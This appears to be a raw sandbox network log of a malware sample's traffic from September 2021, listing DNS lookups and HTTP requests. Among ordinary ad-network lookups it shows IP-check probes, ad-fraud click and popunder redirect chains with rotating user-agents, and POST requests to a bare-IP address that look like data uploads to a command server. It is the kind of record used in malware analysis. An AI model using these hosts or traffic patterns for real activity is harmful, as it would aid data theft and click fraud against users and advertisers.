DNSa.exdynsrv.comRequesta.exdynsrv.comIN AResponsea.exdynsrv.comIN CNAMEyvk8gxz2.ab1n.netyvk8gxz2.ab1n.netIN CNAMEfp276a.wac.sigmacdn.netfp276a.wac.sigmacdn.netIN A72.21.91.75
-
DNSlogger007.cam4.comRequestlogger007.cam4.comIN AResponselogger007.cam4.comIN A184.94.152.23
-
DNSapi.ipify.orgRequestapi.ipify.orgIN AResponseapi.ipify.orgIN CNAMEnagano-19599.herokussl.comnagano-19599.herokussl.comIN CNAMEelb097307-934924932.us-east-1.elb.amazonaws.comelb097307-934924932.us-east-1.elb.amazonaws.comIN A23.21.224.49elb097307-934924932.us-east-1.elb.amazonaws.comIN A50.17.229.70elb097307-934924932.us-east-1.elb.amazonaws.comIN A54.235.91.189elb097307-934924932.us-east-1.elb.amazonaws.comIN A23.21.76.7elb097307-934924932.us-east-1.elb.amazonaws.comIN A50.17.226.156elb097307-934924932.us-east-1.elb.amazonaws.comIN A50.16.185.207elb097307-934924932.us-east-1.elb.amazonaws.comIN A50.16.244.183elb097307-934924932.us-east-1.elb.amazonaws.comIN A54.235.244.43
-
DNSwww.americascardroom.euRequestwww.americascardroom.euIN AResponsewww.americascardroom.euIN A104.16.210.45www.americascardroom.euIN A104.16.209.45
-
DNSpublic.servenobid.comRequestpublic.servenobid.comIN AResponsepublic.servenobid.comIN CNAMEadserver-public-cdn.azureedge.netadserver-public-cdn.azureedge.netIN CNAMEadserver-public-cdn.afd.azureedge.netadserver-public-cdn.afd.azureedge.netIN CNAMEstar-azureedge-prod.trafficmanager.netstar-azureedge-prod.trafficmanager.netIN CNAMEdual.part-0039.t-0009.t-msedge.netdual.part-0039.t-0009.t-msedge.netIN CNAMEpart-0039.t-0009.t-msedge.netpart-0039.t-0009.t-msedge.netIN A13.107.246.67part-0039.t-0009.t-msedge.netIN A13.107.213.67
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
DNSsafebrowsing.googleapis.comRequestsafebrowsing.googleapis.comIN AResponsesafebrowsing.googleapis.comIN A142.250.179.202
-
GEThttp://api.ipify.org/RequestGET / HTTP/1.1
Host: api.ipify.org
Connection: keep-alive
Accept-Encoding: gzip,deflate
ResponseHTTP/1.1 200 OK
Server: Cowboy
Connection: keep-alive
Content-Type: text/plain
Vary: Origin
Date: Mon, 06 Sep 2021 09:48:43 GMT
Content-Length: 12
Via: 1.1 vegur
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:48:42 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSvars.hotjar.comRequestvars.hotjar.comIN AResponsevars.hotjar.comIN A13.227.222.24vars.hotjar.comIN A13.227.222.104vars.hotjar.comIN A13.227.222.72vars.hotjar.comIN A13.227.222.119
-
DNSyesww.ruRequestyesww.ruIN AResponseyesww.ruIN A212.107.18.203
-
DNSntvpevnts.comRequestntvpevnts.comIN AResponsentvpevnts.comIN A168.119.25.22
-
DNSnereserv.comRequestnereserv.comIN AResponsenereserv.comIN A168.119.25.22
-
DNSntvpinp.comRequestntvpinp.comIN AResponsentvpinp.comIN A168.119.25.22
-
DNSdeliverytraffico.comRequestdeliverytraffico.comIN AResponsedeliverytraffico.comIN A198.211.107.77
-
GEThttp://yesww.ru/ads.phpRequestGET /ads.php HTTP/1.1
Host: yesww.ru
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:48:48 GMT
Content-Length: 57785
Connection: close
-
DNSgeolocation.onetrust.comRequestgeolocation.onetrust.comIN AResponsegeolocation.onetrust.comIN A104.20.184.68geolocation.onetrust.comIN A104.20.185.68
-
DNScontextual.media.netRequestcontextual.media.netIN AResponsecontextual.media.netIN A2.16.118.158
-
DNSlptag.liveperson.netRequestlptag.liveperson.netIN AResponselptag.liveperson.netIN CNAMElptag.liveperson.cotcdb.net.livepersonk.akadns.netlptag.liveperson.cotcdb.net.livepersonk.akadns.netIN A178.249.97.23
-
DNSpx.britepool.comRequestpx.britepool.comIN AResponsepx.britepool.comIN A52.202.81.193px.britepool.comIN A35.170.236.164
-
DNSjpxxx.vipRequestjpxxx.vipIN AResponsejpxxx.vipIN A178.238.238.213
-
DNSt-v3.start-xyz.comRequestt-v3.start-xyz.comIN AResponset-v3.start-xyz.comIN A172.67.158.98t-v3.start-xyz.comIN A104.21.74.128
-
GEThttp://jpxxx.vip/index.htmlRequestGET /index.html HTTP/1.1
Host: jpxxx.vip
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; MASMJS; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:48:53 GMT
Content-Type: text/html
Content-Length: 264
Last-Modified: Fri, 18 Jun 2021 05:46:45 GMT
Connection: keep-alive
ETag: "60cc3345-108"
Accept-Ranges: bytes
-
DNSprebid.media.netRequestprebid.media.netIN AResponseprebid.media.netIN A34.107.148.139
-
DNSpixel.adsafeprotected.comRequestpixel.adsafeprotected.comIN AResponsepixel.adsafeprotected.comIN CNAMEvapixel.adsafeprotected.comvapixel.adsafeprotected.comIN CNAMEfirewall-external-1524972847.us-east-1.elb.amazonaws.comfirewall-external-1524972847.us-east-1.elb.amazonaws.comIN A52.204.164.51firewall-external-1524972847.us-east-1.elb.amazonaws.comIN A54.147.163.112firewall-external-1524972847.us-east-1.elb.amazonaws.comIN A52.201.34.141firewall-external-1524972847.us-east-1.elb.amazonaws.comIN A18.232.229.169firewall-external-1524972847.us-east-1.elb.amazonaws.comIN A107.22.9.23firewall-external-1524972847.us-east-1.elb.amazonaws.comIN A174.129.255.162firewall-external-1524972847.us-east-1.elb.amazonaws.comIN A34.192.17.244firewall-external-1524972847.us-east-1.elb.amazonaws.comIN A52.6.20.169
-
DNSconfiguration.apple.comRequestconfiguration.apple.comIN AResponseconfiguration.apple.comIN CNAMEconfiguration.apple.com.akadns.netconfiguration.apple.com.akadns.netIN CNAMEconfiguration.apple.com.edgekey.netconfiguration.apple.com.edgekey.netIN CNAMEe673.dsce9.akamaiedge.nete673.dsce9.akamaiedge.netIN A2.16.118.172
-
DNSkrk.kargo.comRequestkrk.kargo.comIN AResponsekrk.kargo.comIN A107.21.0.187krk.kargo.comIN A3.223.147.57krk.kargo.comIN A3.225.49.235krk.kargo.comIN A3.216.96.138krk.kargo.comIN A107.22.61.52krk.kargo.comIN A3.233.169.27krk.kargo.comIN A52.205.123.115krk.kargo.comIN A52.71.50.199
-
DNShtlb.casalemedia.comRequesthtlb.casalemedia.comIN AResponsehtlb.casalemedia.comIN CNAMEhtlb.casalemedia.com.edgekey.nethtlb.casalemedia.com.edgekey.netIN CNAMEe8037.i.akamaiedge.nete8037.i.akamaiedge.netIN A23.34.186.99
-
DNSbidder.criteo.comRequestbidder.criteo.comIN AResponsebidder.criteo.comIN CNAMEbidder.va1.vip.prod.criteo.combidder.va1.vip.prod.criteo.comIN A74.119.119.129
-
DNSprebid.media.netRequestprebid.media.netIN AResponseprebid.media.netIN A34.107.148.139
-
DNSaax-eu.amazon-adsystem.comRequestaax-eu.amazon-adsystem.comIN AResponseaax-eu.amazon-adsystem.comIN A52.95.123.41
-
DNSpb-logs.media.netRequestpb-logs.media.netIN AResponsepb-logs.media.netIN CNAMEstar.media.net.edgekey.netstar.media.net.edgekey.netIN CNAMEe607.d.akamaiedge.nete607.d.akamaiedge.netIN A2.16.118.158
-
DNSqsearch-a.akamaihd.netRequestqsearch-a.akamaihd.netIN AResponseqsearch-a.akamaihd.netIN CNAMEqsearch-a.akamaihd.net.edgesuite.netqsearch-a.akamaihd.net.edgesuite.netIN CNAMEa267.g.akamai.neta267.g.akamai.netIN A23.209.125.81a267.g.akamai.netIN A23.209.125.93
-
DNSkrk.kargo.comRequestkrk.kargo.comIN AResponsekrk.kargo.comIN A52.71.50.199krk.kargo.comIN A52.205.123.115krk.kargo.comIN A3.224.202.137krk.kargo.comIN A3.225.49.235krk.kargo.comIN A3.233.169.27krk.kargo.comIN A3.216.96.138krk.kargo.comIN A107.21.0.187krk.kargo.comIN A107.22.61.52
-
DNScdn-geuw1-xch.media.netRequestcdn-geuw1-xch.media.netIN AResponsecdn-geuw1-xch.media.netIN CNAMEwildcard.media.net.edgekey.netwildcard.media.net.edgekey.netIN CNAMEe607.e11.akamaiedge.nete607.e11.akamaiedge.netIN A23.62.140.165
-
DNSd3ou4areduq72f.cloudfront.netRequestd3ou4areduq72f.cloudfront.netIN AResponsed3ou4areduq72f.cloudfront.netIN A52.222.137.183d3ou4areduq72f.cloudfront.netIN A52.222.137.57d3ou4areduq72f.cloudfront.netIN A52.222.137.79d3ou4areduq72f.cloudfront.netIN A52.222.137.212
-
DNSgum.criteo.comRequestgum.criteo.comIN AResponsegum.criteo.comIN CNAMEgum.am5.vip.prod.criteo.comgum.am5.vip.prod.criteo.comIN A178.250.2.146
-
DNSstatic.criteo.netRequeststatic.criteo.netIN AResponsestatic.criteo.netIN CNAMEstatic.par.vip.prod.criteo.netstatic.par.vip.prod.criteo.netIN A178.250.0.130
-
DNSadservice.google.nlRequestadservice.google.nlIN AResponseadservice.google.nlIN CNAMEpagead46.l.doubleclick.netpagead46.l.doubleclick.netIN A142.250.179.162
-
DNSthrtle.comRequestthrtle.comIN AResponsethrtle.comIN A54.85.146.188thrtle.comIN A52.0.73.248thrtle.comIN A3.215.242.19thrtle.comIN A3.95.130.137thrtle.comIN A3.226.63.214thrtle.comIN A3.220.38.221thrtle.comIN A107.21.238.20thrtle.comIN A52.72.74.246
-
POSThttp://185.215.113.202/PmVc3sOf/index.phpRequestPOST /PmVc3sOf/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.202
Content-Length: 83
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 06 Sep 2021 09:48:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
POSThttp://185.215.113.202/PmVc3sOf/index.php?scr=1RequestPOST /PmVc3sOf/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----237f69f1ed9dd3ff02e70c8bc6dac281
Host: 185.215.113.202
Content-Length: 65744
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 06 Sep 2021 09:48:58 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
-
DNS9df4a7e0a0b8c40efbda102efff97fb0.safeframe.googlesyndication.comRequest9df4a7e0a0b8c40efbda102efff97fb0.safeframe.googlesyndication.comIN AResponse9df4a7e0a0b8c40efbda102efff97fb0.safeframe.googlesyndication.comIN CNAMEpagead-googlehosted.l.google.compagead-googlehosted.l.google.comIN A142.250.179.193
-
DNSwww.google-analytics.comRequestwww.google-analytics.comIN AResponsewww.google-analytics.comIN CNAMEwww-google-analytics.l.google.comwww-google-analytics.l.google.comIN A142.251.36.14
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Connection: close
Host: lumtest.com
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:48:57 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSqsearch-a.akamaihd.netRequestqsearch-a.akamaihd.netIN AResponseqsearch-a.akamaihd.netIN CNAMEqsearch-a.akamaihd.net.edgesuite.netqsearch-a.akamaihd.net.edgesuite.netIN CNAMEa267.g.akamai.neta267.g.akamai.netIN A23.209.125.81a267.g.akamai.netIN A23.209.125.93
-
DNSapi.britepool.comRequestapi.britepool.comIN AResponseapi.britepool.comIN A35.170.1.209api.britepool.comIN A34.233.237.100
-
DNSclevernt.comRequestclevernt.comIN AResponseclevernt.comIN A104.26.10.117clevernt.comIN A104.26.11.117clevernt.comIN A172.67.72.95
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:48:59 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSwww.googletagservices.comRequestwww.googletagservices.comIN AResponsewww.googletagservices.comIN A142.251.36.2
-
DNScsm.nl.eu.criteo.netRequestcsm.nl.eu.criteo.netIN AResponsecsm.nl.eu.criteo.netIN CNAMEcsm.am5.vip.prod.criteo.netcsm.am5.vip.prod.criteo.netIN A178.250.2.150
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160
-
DNSxhoney.ruRequestxhoney.ruIN AResponsexhoney.ruIN A178.238.238.213
-
DNSlogger007.cam4.comRequestlogger007.cam4.comIN AResponselogger007.cam4.comIN A184.94.152.23
-
DNSstatic.bookmsg.comRequeststatic.bookmsg.comIN AResponse
-
GEThttp://alfad.pro/ad/ad?p=266933&w=619326&t=84fd5e93a3d24687&r=aHR0cCUzQSUyRiUyRndlYjIubG9vay1hdi5jb20lMkZ3ZWIyLnBocA==&vw=887&vh=537RequestGET /ad/ad?p=266933&w=619326&t=84fd5e93a3d24687&r=aHR0cCUzQSUyRiUyRndlYjIubG9vay1hdi5jb20lMkZ3ZWIyLnBocA==&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/619326
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 303 See Other
Date: Mon, 06 Sep 2021 09:49:01 GMT
Location: https://bongacams7.com/track?v=2&c=602941
Server: nginx
Content-Length: 0
Connection: keep-alive
-
DNSwww.americascardroom.euRequestwww.americascardroom.euIN AResponsewww.americascardroom.euIN A104.16.209.45www.americascardroom.euIN A104.16.210.45
-
DNSwww.americascardroom.euRequestwww.americascardroom.euIN AResponsewww.americascardroom.euIN A104.16.209.45www.americascardroom.euIN A104.16.210.45
-
DNStotaceha.proRequesttotaceha.proIN AResponsetotaceha.proIN A88.85.94.237
-
DNSwww.americascardroom.euRequestwww.americascardroom.euIN AResponsewww.americascardroom.euIN A104.16.210.45www.americascardroom.euIN A104.16.209.45
-
DNSwww.americascardroom.euRequestwww.americascardroom.euIN AResponsewww.americascardroom.euIN A104.16.210.45www.americascardroom.euIN A104.16.209.45
-
DNSwww.americascardroom.euRequestwww.americascardroom.euIN AResponsewww.americascardroom.euIN A104.16.209.45www.americascardroom.euIN A104.16.210.45
-
DNSstatic.bookmsg.comRequeststatic.bookmsg.comIN AResponsestatic.bookmsg.comIN A88.198.209.36static.bookmsg.comIN A88.198.136.226static.bookmsg.comIN A88.198.186.100static.bookmsg.comIN A78.47.199.218static.bookmsg.comIN A168.119.25.82static.bookmsg.comIN A88.198.136.228static.bookmsg.comIN A78.47.199.204static.bookmsg.comIN A168.119.25.18static.bookmsg.comIN A94.130.197.136static.bookmsg.comIN A116.202.204.10static.bookmsg.comIN A159.69.163.6static.bookmsg.comIN A94.130.197.140static.bookmsg.comIN A94.130.197.142static.bookmsg.comIN A88.198.204.168static.bookmsg.comIN A159.69.163.10static.bookmsg.comIN A88.198.186.112static.bookmsg.comIN A85.10.217.108static.bookmsg.comIN A88.198.209.13static.bookmsg.comIN A85.10.217.94static.bookmsg.comIN A168.119.25.66static.bookmsg.comIN A78.47.181.156static.bookmsg.comIN A88.198.200.22static.bookmsg.comIN A88.198.204.164static.bookmsg.comIN A168.119.25.70static.bookmsg.comIN A88.198.139.234static.bookmsg.comIN A168.119.25.64static.bookmsg.comIN A88.198.136.234static.bookmsg.comIN A78.47.199.210static.bookmsg.comIN A116.202.204.12static.bookmsg.comIN A159.69.161.134static.bookmsg.comIN A88.198.200.20static.bookmsg.comIN A159.69.163.8static.bookmsg.comIN A168.119.25.20static.bookmsg.comIN A168.119.25.62static.bookmsg.comIN A159.69.163.2static.bookmsg.comIN A88.198.204.166static.bookmsg.comIN A88.198.209.34static.bookmsg.comIN A159.69.161.138static.bookmsg.comIN A138.201.237.88static.bookmsg.comIN A88.198.209.15static.bookmsg.comIN A159.69.167.66static.bookmsg.comIN A168.119.25.80static.bookmsg.comIN A85.10.217.30static.bookmsg.comIN A159.69.163.4static.bookmsg.comIN A78.47.199.206static.bookmsg.comIN A168.119.25.78static.bookmsg.comIN A78.47.199.202static.bookmsg.comIN A138.201.236.216static.bookmsg.comIN A94.130.197.138static.bookmsg.comIN A88.198.200.36
-
GEThttp://xhoney.ru/index.htmlRequestGET /index.html HTTP/1.1
Host: xhoney.ru
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-T237P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:49:00 GMT
Content-Type: text/html
Content-Length: 168
Last-Modified: Mon, 02 Aug 2021 07:25:28 GMT
Connection: keep-alive
ETag: "61079de8-a8"
Accept-Ranges: bytes
-
DNSipp-5556.coderformylife.infoRequestipp-5556.coderformylife.infoIN AResponseipp-5556.coderformylife.infoIN A104.22.11.55ipp-5556.coderformylife.infoIN A172.67.20.248ipp-5556.coderformylife.infoIN A104.22.10.55
-
DNSwww.clinique.comRequestwww.clinique.comIN AResponsewww.clinique.comIN CNAMEsan.clinique.com.edgekey.netsan.clinique.com.edgekey.netIN CNAMEe3243.x.akamaiedge.nete3243.x.akamaiedge.netIN A104.73.132.10
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160
-
DNSpornbay.tvRequestpornbay.tvIN AResponsepornbay.tvIN A216.18.168.201
-
DNSgum.criteo.comRequestgum.criteo.comIN AResponsegum.criteo.comIN CNAMEgum.am5.vip.prod.criteo.comgum.am5.vip.prod.criteo.comIN A178.250.2.146
-
DNStotaceha.proRequesttotaceha.proIN AResponsetotaceha.proIN A88.85.94.237
-
GEThttp://alfad.pro/go/266933/627611RequestGET /go/266933/627611 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:49:01 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 271
Connection: keep-alive
-
GEThttp://ipp-5556.coderformylife.info/api/message-in-page/click?id=f1701600598123&time=1630921698&sig=08668f40f3c27633471b5d5a696d4e&u=aHR0cHM6Ly9ldS5wb3N0c3VwcG9ydC5uZXQvcG9zdGJhY2svY2xpY2s%2Fa2V5PXYyLTE2MzA5MjE2OTgwNTItNy02NzkwLTk0MTQwMC1hYzBhYTFhOC0wNDQwLTQ1YWItODIyMS1kODhhZDlhMTgwMTI%3D&srv=1&bhi=SYUDhSMG1NITTZMpeTlsZFM18d2IzTjBjM1FZ3Y0c5eWRDNXIVaWFF2YldWMGNtCbGpjeTl6WVhabExtGbHRaejlsZG1WdWREMTXBjbUZqYTJWa1gybHRjSEPpsYzNOcGIyNXpKbUpwWkMx9cFpEMTJNaTB4TmpNd09USXhOYams0TURVeUxUY3ROamM1TUMwNUi5ERTBNREF0WVdNd1lXRXhZVGd0TUlRRME1DMDBOV0ZpTFRneU1qRXRaRGc0XWVdRNVlURTRNREV5Sm5CeWFXTmxQVEFtSYVcxblBXaDBkSEJ6SlROQkpUSkdKVEpHWlDc1bmFXNWxMbUpzWVdOeVlXWjBMbU52YlNVeVUJuQjFjMmd1Wlc1bmFXNWxKVE5HWlhZbE0wUmhZcMnNsTWpaMGVYQmxKVE5FU1dOdmJpVXlObWxrSlRODRU5HRTVNV1ZqTXpJdE4yWmxaUzAwWkdKaUxUazRaV0Vl0TVRKbU5tRmlaV0UxWmpreEpUSTJaR05wWkNVelJERmZZZM1I0WHpBME1XSXlaRFJqTFRGalpUTXROR1UyWWkwNE5HKRmhMVEZpWkRKbU9XWTNZbVl3TmlVeU5uQmljbWxrSlRORU1tHSTVZVEU1TTJJdFpHUmhaQzAwTlRWa0xXRm1NbU10WWpOaVlqWTsFaVGN6WkRjMg%3D%3DRequestGET /api/message-in-page/click?id=f1701600598123&time=1630921698&sig=08668f40f3c27633471b5d5a696d4e&u=aHR0cHM6Ly9ldS5wb3N0c3VwcG9ydC5uZXQvcG9zdGJhY2svY2xpY2s%2Fa2V5PXYyLTE2MzA5MjE2OTgwNTItNy02NzkwLTk0MTQwMC1hYzBhYTFhOC0wNDQwLTQ1YWItODIyMS1kODhhZDlhMTgwMTI%3D&srv=1&bhi=SYUDhSMG1NITTZMpeTlsZFM18d2IzTjBjM1FZ3Y0c5eWRDNXIVaWFF2YldWMGNtCbGpjeTl6WVhabExtGbHRaejlsZG1WdWREMTXBjbUZqYTJWa1gybHRjSEPpsYzNOcGIyNXpKbUpwWkMx9cFpEMTJNaTB4TmpNd09USXhOYams0TURVeUxUY3ROamM1TUMwNUi5ERTBNREF0WVdNd1lXRXhZVGd0TUlRRME1DMDBOV0ZpTFRneU1qRXRaRGc0XWVdRNVlURTRNREV5Sm5CeWFXTmxQVEFtSYVcxblBXaDBkSEJ6SlROQkpUSkdKVEpHWlDc1bmFXNWxMbUpzWVdOeVlXWjBMbU52YlNVeVUJuQjFjMmd1Wlc1bmFXNWxKVE5HWlhZbE0wUmhZcMnNsTWpaMGVYQmxKVE5FU1dOdmJpVXlObWxrSlRODRU5HRTVNV1ZqTXpJdE4yWmxaUzAwWkdKaUxUazRaV0Vl0TVRKbU5tRmlaV0UxWmpreEpUSTJaR05wWkNVelJERmZZZM1I0WHpBME1XSXlaRFJqTFRGalpUTXROR1UyWWkwNE5HKRmhMVEZpWkRKbU9XWTNZbVl3TmlVeU5uQmljbWxrSlRORU1tHSTVZVEU1TTJJdFpHUmhaQzAwTlRWa0xXRm1NbU10WWpOaVlqWTsFaVGN6WkRjMg%3D%3D HTTP/1.1
Host: ipp-5556.coderformylife.info
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 302 Found
Date: Mon, 06 Sep 2021 09:49:01 GMT
Content-Type: application/json; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Headers: Content-type
Access-Control-Allow-Credentials: true
Location: https://wait5sec.com/dvzMy91L?source=35107
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 68a6c8f12e7e4206-AMS
-
DNSlangke.fr.amRequestlangke.fr.amIN AResponselangke.fr.amIN A212.107.18.203
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160
-
DNSu-7188.onetouch7.infoRequestu-7188.onetouch7.infoIN AResponseu-7188.onetouch7.infoIN A104.21.1.66u-7188.onetouch7.infoIN A172.67.128.189
-
DNSv4.s.arclk.netRequestv4.s.arclk.netIN AResponsev4.s.arclk.netIN A3.95.97.23v4.s.arclk.netIN A34.232.96.32v4.s.arclk.netIN A44.196.216.26
-
GEThttp://alfad.pro/ad/ad?p=266933&w=619332&t=bfcf844910a6f3f5&r=aHR0cCUzQSUyRiUyRnd3NS54eHhveHguY29tJTJGd3c1LnBocA==&vw=887&vh=537RequestGET /ad/ad?p=266933&w=619332&t=bfcf844910a6f3f5&r=aHR0cCUzQSUyRiUyRnd3NS54eHhveHguY29tJTJGd3c1LnBocA==&vw=887&vh=537 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:60.9) Gecko/20100101 Goanna/4.1 Firefox/60.9 PaleMoon/28.2.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://alfad.pro/go/266933/619332
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 303 See Other
Date: Mon, 06 Sep 2021 09:49:01 GMT
Location: https://www.fpcpopunder.com/popunder/popunder.cgi?program=light&account=pub_fpc_popcash&track=A
Server: nginx
Content-Length: 0
Connection: keep-alive
-
POSThttp://langke.fr.am/adw.phpRequestPOST /adw.php HTTP/1.1
Host: langke.fr.am
Connection: keep-alive
Content-Length: 67
Cache-Control: max-age=0
Origin: http://langke.fr.am
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 SeaMonkey/2.49.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://langke.fr.am/adw.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:49:01 GMT
Content-Length: 57785
Connection: close
-
GEThttp://u-7188.onetouch7.info/api/rtb-pops/go?id=188761598017849&sig=866a10110347febdf72ceddb3b465c&u=aHR0cHM6Ly90ZHNrZXkuY29tL3RyYWZmaWNzdGFycy1kYW8yP2Nvc3Q9e3ByaWNlfSZjdXJyZW5jeT11c2QmZXh0ZXJuYWxfaWQ9e3N1Yl9pZH0mY3JlYXRpdmVfaWQ9e2NyZWF0aXZlX2lkfSZhZF9jYW1wYWlnbl9pZD17Y2FtcGFpZ25faWR9JnNvdXJjZT17c291cmNlfSZjcGM9e2NwY30%3DRequestGET /api/rtb-pops/go?id=188761598017849&sig=866a10110347febdf72ceddb3b465c&u=aHR0cHM6Ly90ZHNrZXkuY29tL3RyYWZmaWNzdGFycy1kYW8yP2Nvc3Q9e3ByaWNlfSZjdXJyZW5jeT11c2QmZXh0ZXJuYWxfaWQ9e3N1Yl9pZH0mY3JlYXRpdmVfaWQ9e2NyZWF0aXZlX2lkfSZhZF9jYW1wYWlnbl9pZD17Y2FtcGFpZ25faWR9JnNvdXJjZT17c291cmNlfSZjcGM9e2NwY30%3D HTTP/1.1
Host: u-7188.onetouch7.info
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.6.2000 Chrome/30.0.1599.101 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://pornhub.bid/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 302 Found
Date: Mon, 06 Sep 2021 09:49:01 GMT
Content-Type: text/html; charset=UTF-8
